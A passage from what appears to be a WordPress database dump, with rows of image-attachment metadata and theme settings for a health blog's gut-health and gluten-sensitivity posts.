:8:\"filesize\";i:39363;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:20:\"Health-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60532;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:10:\"Health.jpg\";}'),(14816,5560,'_wp_attachment_image_alt','Hormones and the Gut'),(14817,5558,'_thumbnail_id','5560'),(14818,5567,'_edit_lock','1694678485:1'),(14819,5568,'_wp_attached_file','2023/09/Health-Shots-scaled.jpg'),(14820,5568,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1740;s:4:\"file\";s:31:\"2023/09/Health-Shots-scaled.jpg\";s:8:\"filesize\";i:477584;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"Health-Shots-300x204.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14117;}s:5:\"large\";a:5:{s:4:\"file\";s:25:\"Health-Shots-1024x696.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:696;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93607;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"Health-Shots-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6692;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"Health-Shots-768x522.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59074;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"Health-Shots-1536x1044.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1044;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187654;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:26:\"Health-Shots-2048x1392.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1392;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:313368;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:24:\"Health-Shots-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46158;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:25:\"Health-Shots-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81370;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:25:\"Health-Shots-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78394;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:26:\"Health-Shots-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:146429;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:16:\"Health-Shots.jpg\";}'),(14821,5568,'_wp_attachment_image_alt','Health Shots'),(14822,5569,'_wp_attached_file','2023/09/Health-Shots-1-scaled.jpg'),(14823,5569,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1660;s:4:\"file\";s:33:\"2023/09/Health-Shots-1-scaled.jpg\";s:8:\"filesize\";i:498457;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Health-Shots-1-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14228;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"Health-Shots-1-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96922;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Health-Shots-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"Health-Shots-1-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60807;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"Health-Shots-1-1536x996.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:996;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196096;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:28:\"Health-Shots-1-2048x1328.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:328971;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:26:\"Health-Shots-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48566;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:27:\"Health-Shots-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87438;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:27:\"Health-Shots-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79507;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:28:\"Health-Shots-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155955;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:18:\"Health-Shots-1.jpg\";}'),(14824,5570,'_wp_attached_file','2023/09/Health-Shots-2-scaled.jpg'),(14825,5570,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1660;s:4:\"file\";s:33:\"2023/09/Health-Shots-2-scaled.jpg\";s:8:\"filesize\";i:498457;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"Health-Shots-2-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14228;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"Health-Shots-2-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96922;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"Health-Shots-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6702;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"Health-Shots-2-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60807;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"Health-Shots-2-1536x996.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:996;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:196096;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:28:\"Health-Shots-2-2048x1328.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:328971;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:26:\"Health-Shots-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48566;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:27:\"Health-Shots-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87438;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:27:\"Health-Shots-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79507;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:28:\"Health-Shots-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155955;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:18:\"Health-Shots-2.jpg\";}'),(14826,5570,'_wp_attachment_image_alt','Gut Health Shots'),(14827,5567,'_thumbnail_id','5570'),(14828,5567,'_edit_last','1'),(14829,5567,'qodef_page_content_behind_header_meta','no'),(14830,5567,'qodef_boxed_background_image_attachment_meta','fixed'),(14831,5567,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14832,5567,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14833,5567,'qodef_video_type_meta','social_networks'),(14834,5567,'qodef_audio_type_meta','social_networks'),(14835,5567,'qodef_post_skin','qodef-post-light-skin'),(14836,5567,'qodef_disable_vertical_header_background_image_meta','no'),(14837,5567,'qodef_disable_header_widget_logo_area_meta','no'),(14838,5567,'qodef_disable_header_widget_menu_area_meta','no'),(15006,5654,'qodef_page_content_behind_header_meta','no'),(14840,5574,'_edit_lock','1697126347:1'),(14841,5575,'_wp_attached_file','2023/09/Gut-shot-health-scaled.jpg'),(14842,5575,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1995;s:4:\"file\";s:34:\"2023/09/Gut-shot-health-scaled.jpg\";s:8:\"filesize\";i:345782;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"Gut-shot-health-300x234.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9672;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"Gut-shot-health-1024x798.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:798;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63177;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"Gut-shot-health-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4676;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"Gut-shot-health-768x598.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:598;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39664;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-1536x1197.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1197;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127482;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-2048x1596.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1596;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:220235;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:27:\"Gut-shot-health-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30231;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:28:\"Gut-shot-health-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49102;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:28:\"Gut-shot-health-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54447;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93320;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:19:\"Gut-shot-health.jpg\";}'),(14843,5576,'_wp_attached_file','2023/09/Health-shots-Gut.jpg'),(14844,5576,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2000;s:6:\"height\";i:1352;s:4:\"file\";s:28:\"2023/09/Health-shots-Gut.jpg\";s:8:\"filesize\";i:357251;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"Health-shots-Gut-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10543;}s:5:\"large\";a:5:{s:4:\"file\";s:29:\"Health-shots-Gut-1024x692.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:692;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58926;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"Health-shots-Gut-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5178;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"Health-shots-Gut-768x519.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:519;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38239;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:30:\"Health-shots-Gut-1536x1038.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1038;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:114829;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:28:\"Health-shots-Gut-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30036;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:29:\"Health-shots-Gut-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53395;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:29:\"Health-shots-Gut-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56607;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:30:\"Health-shots-Gut-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90107;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14845,5577,'_wp_attached_file','2023/09/Juice-shots-scaled.jpg'),(14846,5577,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:30:\"2023/09/Juice-shots-scaled.jpg\";s:8:\"filesize\";i:347814;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"Juice-shots-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12202;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"Juice-shots-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77204;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"Juice-shots-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7018;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:24:\"Juice-shots-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93106;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"Juice-shots-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148260;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:25:\"Juice-shots-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:239134;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:23:\"Juice-shots-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46697;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:24:\"Juice-shots-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70055;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:24:\"Juice-shots-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67515;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:25:\"Juice-shots-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141620;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:15:\"Juice-shots.jpg\";}'),(14847,5578,'_wp_attached_file','2023/09/Living-a-healthy-life-scaled.jpg'),(14848,5578,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:1707;s:6:\"height\";i:2560;s:4:\"file\";s:40:\"2023/09/Living-a-healthy-life-scaled.jpg\";s:8:\"filesize\";i:626373;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"Living-a-healthy-life-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12592;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"Living-a-healthy-life-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105492;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"Living-a-healthy-life-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6613;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"Living-a-healthy-life-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131427;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"Living-a-healthy-life-1024x1536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:229757;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:35:\"Living-a-healthy-life-1365x2048.jpg\";s:5:\"width\";i:1365;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:404959;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:33:\"Living-a-healthy-life-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58426;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:34:\"Living-a-healthy-life-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123882;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:34:\"Living-a-healthy-life-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104378;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:35:\"Living-a-healthy-life-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:217906;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:25:\"Living-a-healthy-life.jpg\";}'),(14849,5575,'_wp_attachment_image_alt','Gut Health Shot'),(14850,5579,'_wp_attached_file','2023/09/Gut-shot-health-1-scaled.jpg'),(14851,5579,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1830;s:4:\"file\";s:36:\"2023/09/Gut-shot-health-1-scaled.jpg\";s:8:\"filesize\";i:323386;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-1-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8956;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"Gut-shot-health-1-1024x732.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:732;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59578;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4848;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-1-768x549.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:549;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37267;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:31:\"Gut-shot-health-1-1536x1098.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1098;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120739;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:31:\"Gut-shot-health-1-2048x1464.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1464;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206953;}s:23:\"succulents_qodef_square\";a:5:{s:4:\"file\";s:29:\"Gut-shot-health-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31315;}s:26:\"succulents_qodef_landscape\";a:5:{s:4:\"file\";s:30:\"Gut-shot-health-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49105;}s:25:\"succulents_qodef_portrait\";a:5:{s:4:\"file\";s:30:\"Gut-shot-health-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:54630;}s:21:\"succulents_qodef_huge\";a:5:{s:4:\"file\";s:31:\"Gut-shot-health-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96880;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}s:14:\"original_image\";s:21:\"Gut-shot-health-1.jpg\";}'),(14852,5574,'_thumbnail_id','5774'),(14853,5574,'_edit_last','1'),(14854,5574,'qodef_page_content_behind_header_meta','no'),(14855,5574,'qodef_boxed_background_image_attachment_meta','fixed'),(14856,5574,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(14857,5574,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(14858,5574,'qodef_video_type_meta','social_networks'),(14859,5574,'qodef_audio_type_meta','social_networks'),(14860,5574,'qodef_post_skin','qodef-post-light-skin'),(14861,5574,'qodef_disable_vertical_header_background_image_meta','no'),(14862,5574,'qodef_disable_header_widget_logo_area_meta','no'),(14863,5574,'qodef_disable_header_widget_menu_area_meta','no'),(14864,5581,'_edit_lock','1694686715:1'),(14865,5582,'_wp_attached_file','2023/09/Gluten-Senstivity-scaled.jpg'),(14866,5582,'_wp_attachment_metadata','a:7:{s:5:\"width\";i:2560;s:6:\"height\";i:1703;s:4:\"file\";s:36:\"2023/09/Gluten-Senstivity-scaled.jpg\";s:8:\"filesize\";i:1149879;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"Gluten-Senstivity-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22464;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"Gluten-Senstivity-1024x681.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s: